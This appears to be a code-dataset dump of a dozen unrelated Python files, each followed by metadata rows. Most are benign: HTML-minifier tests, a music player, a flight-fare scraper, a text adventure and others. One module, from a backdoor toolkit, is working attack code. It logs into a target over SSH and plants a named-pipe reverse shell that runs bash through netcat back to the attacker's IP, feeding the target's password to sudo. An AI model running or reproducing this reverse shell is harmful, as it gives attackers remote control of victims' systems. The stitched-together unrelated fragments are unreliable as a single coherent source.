self.assertEqual(minified, html_minify(html))
def test_should_not_convert_entity_the_content_of_script_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_javascript')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_pre_tag(self):
html, minified = self._normal_and_minified('with_pre')
self.assertEqual(minified, html_minify(html))
def test_should_not_convert_entity_the_content_of_pre_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_pre')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_textarea(self):
html, minified = self._normal_and_minified('with_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_convert_to_entities_the_content_of_textarea_tag(self):
html, minified = self._normal_and_minified('with_html_content_in_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_not_convert_entities_within_textarea_tag(self):
html, minified = self._normal_and_minified('with_entities_in_textarea')
result = html_minify(html)
self.assertEqual(minified, result)
def test_should_not_drop_blank_lines_from_the_begin_of_a_textarea(self):
t = 'with_textarea_with_blank_lines'
html, minified = self._normal_and_minified(t)
result = html_minify(html)
self.assertEqual(minified, result)
def test_html_should_be_minified(self):
html = "<html> <body>some text here</body> </html>"
minified = "<html><head></head><body>some text here</body></html>"
self.assertEqual(minified, html_minify(html))
def test_minify_function_should_return_a_unicode_object(self):
html = "<html> <body>some text here</body> </html>"
minified = html_minify(html)
if six.PY2:
self.assertEqual(unicode, type(minified))
else:
self.assertEqual(str, type(minified))
def test_minify_should_respect_encoding(self):
html, minified = self._normal_and_minified('blogpost')
self.assertEqual(minified, html_minify(html))
def test_minify_should_not_prepend_doctype_when_its_not_present(self):
html, minified = self._normal_and_minified('without_doctype')
self.assertEqual(minified, html_minify(html))
def test_minify_should_keep_doctype_when_its_present(self):
html, minified = self._normal_and_minified('with_old_doctype')
self.assertEqual(minified, html_minify(html))
def test_should_exclude_comments_by_default(self):
html, minified = self._normal_and_minified('with_comments_to_exclude')
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_not_exclude_comments(self):
html, minified = self._normal_and_minified('with_comments')
self.assertEqual(minified, html_minify(html, ignore_comments=False))
def test_should_be_able_to_exclude_multiline_comments(self):
t = 'with_multiple_line_comments'
html, minified = self._normal_and_minified(t)
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_exclude_multiple_comments_on_a_page(self):
html, minified = self._normal_and_minified('with_multiple_comments')
self.assertEqual(minified, html_minify(html))
def test_should_not_exclude_conditional_comments(self):
html, minified = self._normal_and_minified('with_conditional_comments')
self.assertEqual(minified, html_minify(html))
def test_should_not_rm_multiline_conditional_comments(self):
html, minified = self._normal_and_minified('with_multiple_line_conditional_comments')
self.assertEqual(minified, html_minify(html))
def test_should_touch_attributes_only_on_tags(self):
html = '<html>\n <body>I selected you!</body>\n </html>'
minified = '<html><head></head><body>I selected you!</body></html>'
self.assertEqual(minified, html_minify(html))
def test_should_be_able_to_minify_html5_tags(self):
html, minified = self._normal_and_minified('html5')
self.assertEqual(minified, html_minify(html))
def test_should_transform_multiple_spaces_in_one(self):
html, minified = self._normal_and_minified('multiple_spaces')
self.assertEqual(minified, html_minify(html))
def test_should_convert_line_break_to_whitespace(self):
html, minified = self._normal_and_minified('line_break')
self.assertEqual(minified, html_minify(html))
def test_should_keep_new_line_as_space_when_minifying(self):
html = '<html><body>Click <a href="#">here</a>\nto see ' +\
'more</body></html>'
minified = '<html><head></head><body>Click <a href="#">here</a> to ' +\
'see more</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_should_not_produce_two_spaces_in_new_line(self):
html = '<html><body>Click <a href="#">here</a> \nto see more' +\
'</body></html>'
minified = '<html><head></head><body>Click <a href="#">here' + \
'</a> to see more</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_should_keep_non_breaking_space(self):
html = '<html><head></head><body>This is seperated by a non breaking space.</body></html>'
minified = u'<html><head></head><body>This is seperated\xa0by a non breaking space.</body></html>'
got_html = html_minify(html)
self.assertEqual(minified, got_html)
def test_non_ascii(self):
html, minified = self._normal_and_minified('non_ascii')
self.assertEqual(minified, html_minify(html))
def test_non_ascii_in_excluded_element(self):
html, minified = self._normal_and_minified(
'non_ascii_in_excluded_element'
)
self.assertEqual(minified, html_minify(html))
| bsd-2-clause | -8,056,160,050,232,105,000 | 42.447674 | 106 | 0.655961 | false |
zenieldanaku/pygpj | func/core/viz.py | 1 | 6108 | # coding=UTF-8
# Viz.py
import os
from math import ceil
from func.core.lang import t, probar_input
def PrepPrint(lista):
imp = ''
lineas = []
for elemento in lista:
imp += str(elemento)+', '
if len(imp) > 75:
lineas.append(imp)
imp = ''
lineas.append(imp)
imprimir = '\n'.join(lineas).rstrip(', ')+'.'
return imprimir
def subselector (prompt,lista,vueltas=1,dos_col=False):
from func.core.config import advt as advertencias
items = []
pool = vueltas
copia = lista *1 # copia de trabajo
for vuelta in range(vueltas):
if vuelta == 0:
paginado = []
for i in range(len(copia)):
if copia[i][0:1] == '\n':
copia[i] = copia[i].strip('\n')
paginado.append('\n'+str(i)+': '+str(t(copia[i])))
else:
paginado.append(str(i)+': '+str(t(copia[i])))
if dos_col == False:
paginar (10,paginado)
else:
paginar_dos_columnas(10,paginado)
while pool > 0:
item = ''
while item == '':
item = input ('\n'+prompt+': ').capitalize()
if item.isnumeric():
item = int(item)
if item in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
elif item not in range(len(copia)):
print(t('La selección es incorrecta, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(copia[item]),end = '. ')
items.append(item)
pool -= 1
else:
item = probar_input (item,copia)
if item == '':
print (t('La selección es incorrecta, intente nuevamente')+'\n')
elif copia.index(item) in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(item),end = '. ')
items.append(copia.index(item))
pool -= 1
if advertencias == True:
if not input(t('¿Estas seguro? ')+t('[S / N]')+' ').strip().lower().startswith(t('s')):
pool += 1
del items[-1]
if vueltas == 1:
return items[0]
else:
return items
def barra (caracteristicas, alineamiento, raza):
'''Genera la barra superior de previsualización'''
FUE = str(caracteristicas['FUE']['Punt'])
DES = str(caracteristicas['DES']['Punt'])
CON = str(caracteristicas['CON']['Punt'])
INT = str(caracteristicas['INT']['Punt'])
SAB = str(caracteristicas['SAB']['Punt'])
CAR = str(caracteristicas['CAR']['Punt'])
barra = ' | '.join([raza,' '.join([t('FUE'),FUE,t('DES'),DES,t('CON'),CON,
t('INT'),INT,t('SAB'),SAB,t('CAR'),CAR]),
'Al '+alineamiento])
return barra
def paginar (tam_pag,lineas):
'''Sencilla función para mostrar lineas de texto paginadas.'''
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
input ('\n[Presione Enter para continuar]\n')
#os.system(['clear','cls'][os.name == 'nt'])
def a_dos_columnas(items):
'''Separa una lista de items en dos columnas para paginar en una sola página.'''
c1 = []
c2 = []
for i in range(len(items)):
if i < len(items)/2:
c1.append(items[i])
else:
c2.append(items[i])
if len(c1) > len(c2):
for i in range(len(c1)-len(c2)):
c2.append('')
lineas = []
for i in range(len(c1)):
if len(c1[i]) > 32:
lineas.append(c1[i] +'\t'+ c2[i])
elif len(c1[i]) > 23:
lineas.append(c1[i] +'\t'*2+ c2[i])
elif len(c1[i]) > 15:
lineas.append(c1[i] +'\t'*3+ c2[i])
elif len(c1[i]) > 7:
lineas.append(c1[i] +'\t'*4+ c2[i])
else:
lineas.append(c1[i] +'\t'*5+ c2[i])
return lineas
def paginar_dos_columnas(tam_pag,lista):
pags = ceil((len(lista)/2)/tam_pag)
c1 = [[] for i in range(pags)]
c2 = [[] for i in range(pags)]
j = 0
for i in range(len(lista)):
if i == tam_pag*2*(j+1):
j += 1
if i < tam_pag+(tam_pag*2)*j:
c1[j].append(lista[i])
else:
c2[j].append(lista[i])
if len(c1[-1]) > len(c2[-1]):
for i in range(len(c1[-1])-len(c2[-1])):
c2[-1].append('')
lineas = []
for i in range(pags):
for j in range(len(c1[i])):
if len(c1[i][j]) > 31:
lineas.append(c1[i][j] +'\t'+ c2[i][j])
elif len(c1[i][j]) > 23:
lineas.append(c1[i][j] +'\t'*2+ c2[i][j])
elif len(c1[i][j]) > 15:
lineas.append(c1[i][j] +'\t'*3+ c2[i][j])
elif len(c1[i][j]) > 7:
lineas.append(c1[i][j] +'\t'*4+ c2[i][j])
else:
lineas.append(c1[i][j] +'\t'*5+ c2[i][j])
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
input ('\n[Presione Enter para continuar]\n')
#os.system(['clear','cls'][os.name == 'nt'])
| mit | 1,342,281,639,521,813,200 | 32.659091 | 103 | 0.430984 | false |
vivaxy/algorithms | python/problems/most_common_word.py | 1 | 1131 | """
https://leetcode.com/problems/most-common-word/
https://leetcode.com/submissions/detail/150204402/
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
wordAcc = dict()
for word in paragraph.lower().replace(',', '').replace('.', '').replace('!', '').replace('?', '').replace('\'', '').replace(';', '').split(' '):
if word not in banned:
if word in wordAcc:
wordAcc[word] += 1
else:
wordAcc[word] = 1
maxCount = 0
ans = ''
for word in wordAcc:
count = wordAcc[word]
if count > maxCount:
maxCount = count
ans = word
return ans
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.mostCommonWord(
'Bob hit a ball, the hit BALL flew far after it was hit.', ['hit']), 'ball')
if __name__ == '__main__':
unittest.main()
| mit | -3,210,401,791,503,412,000 | 24.704545 | 152 | 0.505747 | false |
hanxi/pyfm | pyfm.py | 1 | 2766 | #!/usr/bin/python
# coding: utf-8
import sys
import os
import threading
import time
import random
import json
import signal
import gst
# 基础类
class MusicBase:
def __init__(self):
self.app_name = 'console_fm'
self.appPath = os.path.realpath(sys.path[0])
jsonStr = open(self.appPath+'/music2type.json').read()
self.music2type = json.loads(jsonStr)
noneType = []
for k in self.music2type.keys():
if len(self.music2type[k])==0:
noneType.append(k)
for v in noneType:
del self.music2type[v]
self.player = gst.element_factory_make('playbin', 'player')
self.event = threading.Event()
self.playing = False
next(self)
bus = self.player.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_message)
# gst 消息处理
def on_message(self, bus, message):
if message.type == gst.MESSAGE_EOS:
self.next(bus)
# 主线程函数,循环播放
def mainloop(self):
while True:
#print self.title,self.url
self.player.set_property('uri', self.url)
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
# 让线程进入等待状态,等待激活信号
self.event.wait()
self.event.clear()
# 播放/暂停
def pause(self):
if self.playing:
self.player.set_state(gst.STATE_PAUSED)
self.playing = False
print '暂停'
else:
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
print '继续播放'
# 下一首
def next(self):
self.player.set_state(gst.STATE_NULL)
self.event.set()
key = random.choice(self.music2type.keys())
self.title = random.choice(self.music2type[key].keys())
self.url = self.music2type[key][self.title]
print "播放:",self.title
# 开启主播放线程
def run(self):
self.thread = threading.Thread(target=self.mainloop)
self.thread.setDaemon(True)
self.thread.start()
while True:
if not self.thread.isAlive(): break
# 销毁播放器,目前尚未找到结束播放线程的方法
def destroy(self):
self.thread._Thread__stop()
# 主播放Console界面
class MusicMainConsole():
def __init__(self):
self.fm = MusicBase()
self.fm.run()
def sigint_handler(signum, frame):
print ("exit")
sys.exit()
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
random.seed(time.time())
MusicMainConsole()
| mit | 7,971,246,647,054,509,000 | 25.02 | 67 | 0.577633 | false |
wittrup/crap | python/encoding.py | 1 | 1363 |
N = 0 # character never appears in text
A = 1 # character appears in plain ASCII text
I = 2 # character appears in ISO-8859 text
X = 3 # character appears in non-ISO extended ASCII (Mac, IBM PC)
text_chars = [
# BEL BS HT LF VT FF CR
N, N, N, N, N, N, N, A, A, A, A, A, A, A, N, N, # 0x0X
# ESC
N, N, N, N, N, N, N, N, N, N, N, A, N, N, N, N, # 0x1X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x2X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x3X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x4X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x5X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x6X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, N, # 0x7X
# NEL
X, X, X, X, X, A, X, X, X, X, X, X, X, X, X, X, # 0x8X
X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, # 0x9X
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xaX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xbX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xcX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xdX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xeX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I # 0xfX
]
if __name__ == '__main__':
print('\n'.join(str(text_chars[i:i+16]) for i in range(0, len(text_chars), 16))) | mit | -1,026,429,806,372,490,800 | 44.466667 | 81 | 0.405723 | false |
dopplesoldner/algorithms | hash/two_sum.py | 1 | 1919 | """The goal of this problem is to implement a variant of the 2-SUM algorithm
(covered in the Week 6 lecture on hash table applications).
The file contains 500,000 positive integers (there might be some repetitions!).
This is your array of integers, with the ith row of the file specifying the ith
entry of the array.
Your task is to compute the number of target values t in the interval
[2500,4000] (inclusive) such that there are distinct numbers x,y in the input
file that satisfy x+y=t. (NOTE: ensuring distinctness requires a one-line
addition to the algorithm from lecture.)
"""
def two_sum(int_array, lb, ub):
"""return number of pairs in int_array whose sum is between lb and ub.
>>> two_sum([1, 2, 3, 4, 5], 3, 4)
2
>>> two_sum([1, 2, 3, 4, 5], 3, 3)
1
>>> two_sum([0, 1, 2, 3, 4], 3, 3)
1
>>> two_sum([-1, 1, 2, 3, 4], 2, 4)
3
"""
hash_int = {}
sum_hash = {}
for x in int_array:
if x >= ub: continue
hash_int[x] = True
for x in int_array:
if x >= ub: continue
for sum_x_y in range(lb, ub + 1):
y = sum_x_y - x
if x < y and y in hash_int:
# print '%s + %s = %s' % (x, y, sum_x_y)
sum_hash[sum_x_y] = True
return len(sum_hash)
def read_input(file_name):
int_array = []
with open(file_name) as f:
for line in f:
x = int(line)
int_array.append(x)
return int_array
def test_two_sum():
int_array = read_input('test1.txt')
sum_cnt = two_sum(int_array, 30, 60)
assert sum_cnt == 9, '%s != 9' % sum_cnt
int_array = read_input('test2.txt')
sum_cnt = two_sum(int_array, 30, 60)
assert sum_cnt == 20, '%s != 20' % sum_cnt
if __name__ == '__main__':
import doctest
doctest.testmod()
# test_two_sum()
int_array = read_input('input.txt')
print two_sum(int_array, -10000, 10000) | mit | 1,159,057,494,985,307,000 | 28.090909 | 79 | 0.576342 | false |
elationfoundation/git_hooks | pre-commit/python/timestamp.py | 1 | 1631 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
from datetime import datetime
class TestSuite():
def __init__(self):
self.stdout = 0
def run(self, files):
for file_name in files:
try:
self.set_changed(file_name)
except Exception as _ee:
print(_ee)
print("Completed time stamping")
return 0
def system(self, *args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def current_time(self):
"""Current date-time"""
return datetime.now().strftime('%Y-%m-%d %H:%M')
def set_changed(self, file_name):
# watching python and lua scripts
if re.search(r"(\.py|\.lua)$", file_name):
# current script text
with open(file_name, 'r') as fd: script = fd.read()
# change modification date
try:
_now = self.current_time()
print(_now)
script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}', lambda m: m.group(1) + _now, script)
except Exception as __ee:
print(__ee)
# write back to script
with open(file_name, 'w') as fd: fd.write(script)
# add changes to commit
try:
print(file_name+"'s timestamp updated")
self.system('git', 'add', file_name)
except Exception as _ee:
print(_ee)
return 0
| gpl-2.0 | 188,132,529,603,103,600 | 30.365385 | 118 | 0.505825 | false |
Weihonghao/ECM | find_emotion_word.py | 1 | 1493 | from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from tqdm import tqdm
import mmap
def whetherEmotion(word, threshold):
analyzer = SentimentIntensityAnalyzer()
sentiment_result = analyzer.polarity_scores(word)
if abs(sentiment_result['compound']) > threshold:
return True
return False
def get_line_number(file_path):
fp = open(file_path, "r+")
buf = mmap.mmap(fp.fileno(), 0)
lines = 0
while buf.readline():
lines += 1
return lines
if __name__ == '__main__':
threshold = 0.5
out = open("/commuter/chatbot/Commuter/data/emotion_vocab.txt",'w')
emotion_word_set = set()
line_number = get_line_number('/commuter/chatbot/Commuter/question.txt')
print(line_number)
f = open("/commuter/chatbot/Commuter/question.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
#emotion_word_set = set()
f = open("/commuter/chatbot/Commuter/answer.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
'''line = line.strip()
if whetherEmotion(line, threshold):
emotion_word_set.add(line)'''
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
for each in emotion_word_set:
out.write(each)
out.write("\n")
out.close()
| agpl-3.0 | 8,073,913,267,619,536,000 | 30.104167 | 73 | 0.653048 | false |
Kkevsterrr/backdoorme | backdoors/shell/netcat.py | 1 | 1739 | from backdoors.backdoor import *
import time
class Netcat(Backdoor):
prompt = Fore.RED + "(nc) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using netcat backdoor..."
self.core = core
self.options = {
"port" : Option("port", 53920, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell."
def get_command(self):
#command = "echo " + self.core.curtarget.pword + " | sudo -S bash -c \"cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f\"" % self.get_value("port")
command = "cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f" % self.get_value("port")
return command
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
self.listen(prompt="some")
#input("Enter the following command in another terminal: nc -v -n -l -p %s" % port)
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /tmp/f")
time.sleep(.5)
target.ssh.exec_command("mkfifo /tmp/f")
#target.ssh.exec_command("echo " + target.pword + " | sudo -S chmod 222 /tmp/f")
target.ssh.exec_command(self.get_command())
print(GOOD + "Netcat backdoor on port %s attempted." % port)
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
| mit | 8,729,828,714,688,870,000 | 44.763158 | 180 | 0.564117 | false |
j2ali/FlightScraper | Scraper.py | 1 | 1950 | from bs4 import BeautifulSoup
import helper
from datetime import datetime
import click
import time
import calendar
#Example values
#START_DATE = datetime(2014, 05, 15)
#END_DATE = datetime(2015, 05, 15)
#DAY_DELTA = 7
#TIMEOUT_SECONDS = 30
#Example Command
#python Scraper.py 2014/05/25 2015/05/15 4 0 YYZ POS
@click.command()
@click.argument('start_date')
@click.argument('end_date')
@click.argument('day_delta')
@click.argument('time_out')
@click.argument('origin_airport')
@click.argument('destination_airport')
def find_flights(start_date, end_date, day_delta, time_out, origin_airport, destination_airport):
start_date = datetime.strptime(start_date, "%Y/%m/%d")
end_date = datetime.strptime(end_date, "%Y/%m/%d")
day_delta = int(day_delta)
time_out = int(time_out)
flight_dates = helper.generate_dates(start_date, end_date, day_delta)
#There is a new output file for each run.
#Use something like time.ctime(int("1284101485")) to get back date
filename = calendar.timegm(datetime.utcnow().utctimetuple())
file = open('DataOut/output_'+str(filename)+'.txt', "a")
for flight_date in flight_dates:
(depart_date, return_date) = flight_date
response = helper.hit_the_site(depart_date,
return_date,
origin_airport,
destination_airport)
soup = BeautifulSoup(response)
data = helper.parse_data(soup)
if len(data) == 0:
file.writelines('No data received might have encounter captcha')
file.close()
break
for a in data:
print a
file.writelines(a.encode('utf-8'))
# Trying to avoid captcha here but looks like timeout is over 30 seconds
# I can go 10 hit then its turned on
time.sleep(time_out)
file.close()
if __name__ == '__main__':
find_flights() | bsd-3-clause | -3,644,755,502,807,923,000 | 31.516667 | 97 | 0.625128 | false |
sagarjauhari/BCIpy | process_series_files.py | 1 | 3765 | # /usr/bin/env python
# Copyright 2013, 2014 Justis Grant Peters and Sagar Jauhari
# This file is part of BCIpy.
#
# BCIpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BCIpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BCIpy. If not, see <http://www.gnu.org/licenses/>.
import sys, os
from os.path import isfile, join
import re
import dateutil.tz
import pandas as pd
import numpy as np
from datetime import datetime
# Create dict of machine data
def create_dict_machine_data(raw_dir):
onlyfiles_raw = [ f for f in os.listdir(raw_dir) if isfile(join(raw_dir,f)) ]
pat_raw = re.compile("[0-9]*\.[a-z0-9]*\.rawwave\.csv")
temp_dat_raw = [f.split('.')[0:2] for f in onlyfiles_raw if pat_raw.match(f)]
mach_dict = {i[1]: i[0] for i in temp_dat_raw}
return mach_dict
def create_raw_incremental(in_file, out_file, time_t, tzinfo=dateutil.tz.tzlocal()):
"Create raw file with incremental miliseconds"
raw = pd.read_csv(in_file, skipinitialspace=True, index_col=False) # avoid index to keep it from sorting
day = time_t[0:4]+"-"+time_t[4:6]+"-"+time_t[6:8]
#print day #debug
# Incoming data has 512Hz samples with timestamps at resolution of one
# second. For each second, convert the first timestamp to epoch time and
# blank out the others so that we can do linear interpolation.
# TODO estimate microseconds on first and last second, to avoid timestretch
# TODO analyze clock skew, since some seconds have more or less samples
# TODO consider a pandas.DatetimeIndex with just a start time and frequency
prev_time = None
for i,row in raw.iterrows():
timestamp = row['%Time']
if timestamp==prev_time:
raw.set_value(i, '%Time', np.NaN)
else:
timestring = day + ' ' + timestamp + '.0'
dt = datetime.strptime(timestring, '%Y-%m-%d %H:%M:%S.%f')\
.replace(tzinfo=tzinfo) # set specified tz before conversion
# time since UTC 1970-01-01 00:00:00, in seconds
dt = float(dt.strftime('%s.%f'))
raw.set_value(i, '%Time', dt)
prev_time = timestamp
timestring = day + ' ' + prev_time + '.0'
dt = datetime.strptime(timestring, '%Y-%m-%d %H:%M:%S.%f')\
.replace(tzinfo=tzinfo) # set specified tz before conversion
# time since UTC 1970-01-01 00:00:00, in seconds
dt = float(dt.strftime('%s.%f'))
raw.set_value(i, '%Time', dt+1)
# reindex with interpolated timestamps
raw.index = pd.DatetimeIndex(
pd.to_datetime(raw['%Time']\
.convert_objects(convert_numeric=True)\
.interpolate(), unit='s')
).tz_localize('UTC').tz_convert(tzinfo) # convert back to original tz
raw.to_csv(out_file, index=True, cols=['Value'])
return raw
def process_all_in_dir(indir, outdir):
if not os.path.exists(outdir):
os.makedirs(outdir)
mach_dict = create_dict_machine_data(indir)
for i in mach_dict:
file_in = join(indir, mach_dict[i]+"."+i+".rawwave.csv")
print "processing file %s" % file_in
file_out =join(outdir, mach_dict[i]+"."+i+".rawwave_microsec.csv")
create_raw_incremental(file_in,file_out, mach_dict[i])
if __name__ == '__main__':
indir,outdir=sys.argv[1:3]
process_all_in_dir(indir,outdir)
| gpl-3.0 | 3,405,553,341,204,929,000 | 40.833333 | 108 | 0.655511 | false |
IngoBongo/rpg_texual_Rumbo_a | Rumbo_A_V0.0.1/rumbo.py | 1 | 1682 | # -*- coding: utf-8 -*-
# sintaxis for Python 2.7
from random import randint
import jugador
from jugador import Jugador
from criaturas import Enemigo
comand = jugador.Comandos
def main():
jug = Jugador()
jug.nombre = raw_input("¿Cual es tu nombre viager@? : ")
print "escribe: 'ayuda' para ver una lista de acciones.\n"
print "%s se adentra en una oscura cueva, en busca de aventuras."% jug.nombre
while (jug.salud > 0):
linea = raw_input("> ")
arg = linea.split()
if len(arg) > 0:
comando_valido = False
for c in comand.keys():
if arg[0] == c[: len(arg[0])]:
comand[c](jug)
comando_valido = True
break
if not comando_valido:
print "%s no entiende tu sugerencia.\n(escribe 'ayuda' para obtener una lista de obciones.)"% jug.nombre
if __name__ == '__main__':
main()
"""
{Rumbo A... pretende ser un juego textual de aventuras}
Copyright (C) {2017} {by Igor Iglesia Gonzalez}
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
| gpl-3.0 | 850,313,411,132,253,200 | 28.491228 | 120 | 0.650803 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.